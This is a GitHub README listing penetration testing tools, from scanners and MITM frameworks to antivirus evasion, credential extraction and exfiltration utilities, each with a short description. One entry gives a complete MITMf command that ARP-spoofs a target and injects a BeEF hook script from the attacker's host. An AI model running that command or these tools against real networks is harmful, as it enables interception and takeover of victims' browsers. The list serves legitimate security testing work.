Skip to content
A curated list of network penetration testing tools.
Branch: master
Clone or download
Latest commit 0e797fe Nov 8, 2018
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md

README.md

Contents

Tools

Penetration Testing OS Distributions

  • Parrot Security OS - Distribution similar to Kali using the same repositories, but with additional features such as Tor and I2P integration.
  • Kali - GNU/Linux distribution designed for digital forensics and penetration testing.

Multi-paradigm Frameworks

  • Metasploit - Software for offensive security teams to help verify vulnerabilities and manage security assessments.
  • Armitage - Java-based GUI front-end for the Metasploit Framework.
  • Faraday - Multiuser integrated pentesting environment for red teams performing cooperative penetration tests, security audits, and risk assessments.

Network Vulnerability Scanners

  • OpenVAS - Open source implementation of the popular Nessus vulnerability assessment system.
  • Nexpose - Commercial vulnerability and risk management assessment engine that integrates with Metasploit, sold by Rapid7.

Static Analyzers

  • OWASP Dependency Check - Open source static analysis tool that enumerates dependencies used by Java and .NET software code (with experimental support for Python, Ruby, Node.js, C, and C++) and lists security vulnerabilities associated with the depedencies.
  • VisualCodeGrepper - Open source static code analysis tool with support for Java, C, C++, C#, PL/SQL, VB, and PHP. VisualCodeGrepper also conforms to OWASP best practices.
  • Brakeman - Static analysis security vulnerability scanner for Ruby on Rails applications.
  • cppcheck - Extensible C/C++ static analyzer focused on finding bugs.
  • FindBugs - Free software static analyzer to look for bugs in Java code.
  • sobelow - Security-focused static analysis for the Phoenix Framework.
  • bandit - Security oriented static analyser for python code.
  • Progpilot - Static security analysis tool for PHP code.
  • ShellCheck - Static code analysis tool for shell script.
  • Codebeat (open source) - Open source implementation of commercial static code analysis tool with GitHub integration.
  • truffleHog - Git repo scanner.

Web Vulnerability Scanners

  • Netsparker Web Application Security Scanner - Commercial web application security scanner to automatically find many different types of security flaws.
  • OWASP Zed Attack Proxy (ZAP) - Feature-rich, scriptable HTTP intercepting proxy and fuzzer for penetration testing web applications.
  • Nikto - Noisy but fast black box web server and web application vulnerability scanner.
  • WPScan - Black box WordPress vulnerability scanner.
  • cms-explorer - Reveal the specific modules, plugins, components and themes that various websites powered by content management systems are running.
  • ACSTIS - Automated client-side template injection (sandbox escape/bypass) detection for AngularJS.
  • SQLmate - A friend of sqlmap that identifies sqli vulnerabilities based on a given dork and website (optional).
  • ASafaWeb - Free online web vulnerability scanner.

Network Tools

  • pig - GNU/Linux packet crafting tool.
  • Network-Tools.com - Website offering an interface to numerous basic network utilities like ping, traceroute, whois, and more.
  • Intercepter-NG - Multifunctional network toolkit.
  • Legion - Graphical interface offering scriptable, configurable access to existing network infrastructure scanning and enumeration tools.
  • dsniff - Collection of tools for network auditing and pentesting.
  • scapy - Python-based interactive packet manipulation program & library.
  • Printer Exploitation Toolkit (PRET) - Tool for printer security testing capable of IP and USB connectivity, fuzzing, and exploitation of PostScript, PJL, and PCL printer language features.
  • Praeda - Automated multi-function printer data harvester for gathering usable data during security assessments.
  • routersploit - Open source exploitation framework similar to Metasploit but dedicated to embedded devices.
  • impacket - Collection of Python classes for working with network protocols.
  • dnstwist - Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
  • THC Hydra - Online password cracking tool with built-in support for many network protocols, including HTTP, SMB, FTP, telnet, ICQ, MySQL, LDAP, IMAP, VNC, and more.
  • Ncat - TCP/IP command line utility supporting multiple protocols.

Exfiltration Tools

  • HTTPTunnel - Tunnel data over pure HTTP GET/POST requests.
  • Data Exfiltration Toolkit (DET) - Proof of concept to perform data exfiltration using either single or multiple channel(s) at the same time.
  • pwnat - Punches holes in firewalls and NATs.
  • tgcd - Simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls.
  • Iodine - Tunnel IPv4 data through a DNS server; useful for exfiltration from networks where Internet access is firewalled, but DNS queries are allowed.
  • PassHunt - Search file systems for passwords.
  • PANHunt - Search file systems for credit cards.

Network Reconnaissance Tools

  • Shodan - Database containing information on all accessible domains on the internet obtained from passive scanning.
    • pyShodan - Python 3 script for interacting with Shodan API (requires valid API key).
  • zmap - Open source network scanner that enables researchers to easily perform Internet-wide network studies.
  • nmap - Free security scanner for network exploration & security audits.
  • Netdiscover - Simple and quick network scanning tool.
  • xprobe2 - Open source operating system fingerprinting tool.
  • CloudFail - Unmask server IP addresses hidden behind Cloudflare by searching old database records and detecting misconfigured DNS.
  • Mass Scan - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
  • smbmap - Handy SMB enumeration tool.
  • LdapMiner - Multiplatform LDAP enumeration utility.
  • ldapsearch - Linux command line utility for querying LDAP servers.
  • ACLight - Script for advanced discovery of sensitive Privileged Accounts - includes Shadow Admins.
  • Pentest-Tools - Online suite of various different pentest related tools.

Protocol Analyzers and Sniffers

  • tcpdump/libpcap - Common packet analyzer that runs under the command line.
  • Wireshark - Widely-used graphical, cross-platform network protocol analyzer.
  • Yersinia - Packet and protocol analyzer with MITM capability.
  • Fiddler - Cross platform packet capturing tool for capturing HTTP/HTTPS traffic.
  • netsniff-ng - Swiss army knife for for network sniffing.
  • Dshell - Network forensic analysis framework.

Proxies and MITM Tools

  • Responder - Open source NBT-NS, LLMNR, and MDNS poisoner.
  • Responder-Windows - Windows version of the above NBT-NS/LLMNR/MDNS poisoner.
  • MITMf - Multipurpose man-in-the-middle framework.
    • e.g. mitmf --arp --spoof -i eth0 --gateway 192.168.1.1 --targets 192.168.1.20 --inject --js-url http://192.168.1.137:3000/hook.js
  • dnschef - Highly configurable DNS proxy for pentesters.
  • mitmproxy - Interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
  • Morpheus - Automated ettercap TCP/IP Hijacking tool.
  • mallory - HTTP/HTTPS proxy over SSH.
  • SSH MITM - Intercept SSH connections with a proxy; all plaintext passwords and sessions are logged to disk.
  • evilgrade - Modular framework to take advantage of poor upgrade implementations by injecting fake updates.
  • Ettercap - Comprehensive, mature suite for machine-in-the-middle attacks.
  • BetterCAP - Modular, portable and easily extensible MITM framework.

Wireless Network Tools

  • Aircrack-ng - Set of tools for auditing wireless networks.
  • Wifite - Automated wireless attack tool.
  • wifi-pickle - Fake access point attacks.
  • MANA Toolkit - Rogue AP and man-in-the-middle utility.
  • Fluxion - Suite of automated social engineering based WPA attacks.

Transport Layer Security Tools

  • tlssled - Comprehensive TLS/SSL testing suite.
  • SSLyze - Fast and comprehensive TLS/SSL configuration analyzer to help identify security mis-configurations.
  • SSL Labs - Online TLS/SSL testing suite for revealing supported TLS/SSL versions and ciphers.
  • crackpkcs12 - Multithreaded program to crack PKCS#12 files (.p12 and .pfx extensions), such as TLS/SSL certificates.

Web Exploitation

  • Browser Exploitation Framework (BeEF) - Command and control server for delivering exploits to commandeered Web browsers.
  • Wordpress Exploit Framework - Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
  • WPSploit - Exploit WordPress-powered websites with Metasploit.
  • SQLmap - Automated SQL injection and database takeover tool.
  • sqlninja - Automated SQL injection and database takeover tool.
  • tplmap - Automatic server-side template injection and Web server takeover tool.
  • weevely3 - Weaponized web shell.
  • wafw00f - Identifies and fingerprints Web Application Firewall (WAF) products.
  • fimap - Find, prepare, audit, exploit and even Google automatically for LFI/RFI bugs.
  • Kadabra - Automatic LFI exploiter and scanner.
  • Kadimus - LFI scan and exploit tool.
  • liffy - LFI exploitation tool.
  • Commix - Automated all-in-one operating system command injection and exploitation tool.
  • sslstrip - Demonstration of the HTTPS stripping attacks.
  • sslstrip2 - SSLStrip version to defeat HSTS.
  • NoSQLmap - Automatic NoSQL injection and database takeover tool.
  • VHostScan - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages.
  • FuzzDB - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
  • EyeWitness - Tool to take screenshots of websites, provide some server header info, and identify default credentials if possible.
  • webscreenshot - A simple script to take screenshots of list of websites.
  • IIS-Shortname-Scanner - Command line tool to exploit the Windows IIS tilde information disclosure vulnerability.

Hex Editors

  • HexEdit.js - Browser-based hex editing.
  • Hexinator - World's finest (proprietary, commercial) Hex Editor.
  • Frhed - Binary file editor for Windows.
  • Cheat Engine - Memory debugger and hex editor for running applications.

File Format Analysis Tools

  • Kaitai Struct - File formats and network protocols dissection language and web IDE, generating parsers in C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
  • Veles - Binary data visualization and analysis tool.
  • Hachoir - Python library to view and edit a binary stream as tree of fields and tools for metadata extraction.

Anti-virus Evasion Tools

  • shellsploit - Generates custom shellcode, backdoors, injectors, optionally obfuscates every byte via encoders.
  • Hyperion - Runtime encryptor for 32-bit portable executables ("PE .exes").
  • AntiVirus Evasion Tool (AVET) - Post-process exploits containing executable files targeted for Windows machines to avoid being recognized by antivirus software.
  • peCloak.py - Automates the process of hiding a malicious Windows executable from antivirus (AV) detection.
  • peCloakCapstone - Multi-platform fork of the peCloak.py automated malware antivirus evasion tool.
  • UniByAv - Simple obfuscator that takes raw shellcode and generates Anti-Virus friendly executables by using a brute-forcable, 32-bit XOR key.
  • Shellter - Dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.

Hash Cracking Tools

  • Hashcat - Fast hash cracking utility with support for most known hashes as well as OpenCL and CUDA acceleration.
  • John the Ripper - Fast password cracker.
  • CeWL - Generates custom wordlists by spidering a target's website and collecting unique words.
  • JWT Cracker - Simple HS256 JWT token brute force cracker.
  • Rar Crack - RAR bruteforce cracker.

Windows Utilities

  • Sysinternals Suite - The Sysinternals Troubleshooting Utilities.
  • PowerSploit - PowerShell Post-Exploitation Framework.
  • Headstart - Lazy man's Windows privilege escalation tool utilizing PowerSploit.
  • mimikatz - Credentials extraction tool for Windows operating system.
  • Windows Credentials Editor - Inspect logon sessions and add, change, list, and delete associated credentials, including Kerberos tickets.
  • Bloodhound - Graphical Active Directory trust relationship explorer.
  • Empire - Pure PowerShell post-exploitation agent.
  • Fibratus - Tool for exploration and tracing of the Windows kernel.
  • redsnarf - Post-exploitation tool for retrieving password hashes and credentials from Windows workstations, servers, and domain controllers.
  • Magic Unicorn - Shellcode generator for numerous attack vectors, including Microsoft Office macros, PowerShell, HTML applications (HTA), or certutil (using fake certificates).
  • DeathStar - Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments.
  • Hyena - NetBIOS exploitation tool.

GNU/Linux Utilities

  • Linux Exploit Suggester - Heuristic reporting on potentially viable exploits for a given GNU/Linux system.
  • Linus - Security auditing tool for Linux and macOS.

macOS Utilities

  • Bella - Pure Python post-exploitation data mining and remote administration tool for macOS.
  • Linus - Security auditing tool for Linux and macOS.

Social Engineering Tools

OSINT Tools

  • Shodan - World's first search engine for Internet-connected devices.
      • pyShodan - Python 3 script for interacting with Shodan API (requires valid API key).
  • Maltego - Proprietary software for open source intelligence and forensics, from Paterva.
  • Mxtoolbox - Email domain and DNS lookup.
  • Robtex - Domain and IP address lookup.
  • theHarvester - E-mail, subdomain and people names harvester.
  • DNSDumpster - Online DNS recon and search service.
  • dnsenum - Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results.
  • dnsmap - Passive DNS network mapper.
  • dnsrecon - DNS enumeration script.
  • dnstracer - Determines where a given DNS server gets its information from, and follows the chain of DNS servers.
  • passivedns-client - Library and query tool for querying several passive DNS providers.
  • passivedns - Network sniffer that logs all DNS server replies for use in a passive DNS setup.
  • creepy - Geolocation OSINT tool.
  • Google Hacking Database - Database of Google dorks; can be used for recon.
  • GooDork - Command line Google dorking tool.
  • dork-cli - Command line Google dork tool.
  • Censys - Collects data on hosts and websites through daily ZMap and ZGrab scans.
  • recon-ng - Full-featured Web Reconnaissance framework written in Python.
  • github-dorks - CLI tool to scan github repos/organizations for potential sensitive information leak.
  • vcsmap - Plugin-based tool to scan public version control systems for sensitive information.
  • Spiderfoot - Open source OSINT automation tool with a Web UI and report visualizations
  • Threat Crowd - Search engine for threats.
  • Virus Total - Free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware.
  • PacketTotal - Simple, free, high-quality packet capture file analysis facilitating the quick detection of network-borne malware (using Bro and Suricata IDS signatures under the hood).
  • gOSINT - OSINT tool with multiple modules and a telegram scraper.
  • Amass - Subdomain enumeration via scraping, web archives, brute forcing, permutations, reverse DNS sweeping, TLS certificates, passive DNS data sources, etc.
  • XRay - XRay is a tool for recon, mapping and OSINT gathering from public networks.
  • Intel Techniques Online Tools - Use the links to the left to access all of the custom search tools.

Anonymity Tools

  • Tor - Free software and onion routed overlay network that helps you defend against traffic analysis.
  • I2P - The Invisible Internet Project.
  • OnionScan - Tool for investigating the Dark Web by finding operational security issues introduced by Tor hidden service operators.
  • What Every Browser Knows About You - Comprehensive detection page to test your own Web browser's configuration for privacy and identity leaks.

Reverse Engineering Tools

  • VirusTotal - Online malware scanner.
  • Hybrid Analysis - Online malware scanner.
  • Interactive Disassembler (IDA Pro) - Proprietary multi-processor disassembler and debugger for Windows, GNU/Linux, or macOS; also has a free version, IDA Free.
  • WDK/WinDbg - Windows Driver Kit and WinDbg.
  • OllyDbg - x86 debugger for Windows binaries that emphasizes binary code analysis.
  • Radare2 - Open source, crossplatform reverse engineering framework.
  • x64dbg - Open source x64/x32 debugger for windows.
  • Immunity Debugger - Powerful way to write exploits and analyze malware.
  • Evan's Debugger - OllyDbg-like debugger for GNU/Linux.
  • Medusa - Open source, cross-platform interactive disassembler.
  • plasma - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.
  • peda - Python Exploit Development Assistance for GDB.
  • dnSpy - Tool to reverse engineer .NET assemblies.
  • binwalk - Fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.
  • PyREBox - Python scriptable Reverse Engineering sandbox by Cisco-Talos.
  • Voltron - Extensible debugger UI toolkit written in Python.
  • Capstone - Lightweight multi-platform, multi-architecture disassembly framework.
  • rVMI - Debugger on steroids; inspect userspace processes, kernel drivers, and preboot environments in a single tool.

Side-channel Tools

  • ChipWhisperer - Complete open-source toolchain for side-channel power analysis and glitching attacks.

License

CC-BY

This work is licensed under a Creative Commons Attribution 4.0 International License.

You can’t perform that action at this time.